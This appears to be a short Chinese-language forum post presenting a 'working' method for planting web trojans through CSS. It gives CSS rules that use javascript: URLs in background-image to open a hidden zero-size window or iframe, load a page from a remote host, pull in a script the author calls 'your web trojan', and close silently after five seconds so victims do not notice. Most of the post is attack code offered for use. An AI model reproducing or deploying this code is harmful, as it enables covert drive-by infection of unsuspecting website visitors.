真正能用,还有点效果的CSS挂马代码的方法

网上流行的:
body
{ 
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{ 
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:

body
{ 
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:
<script src="a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script> 
a.js内容:
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>'); 
请指教.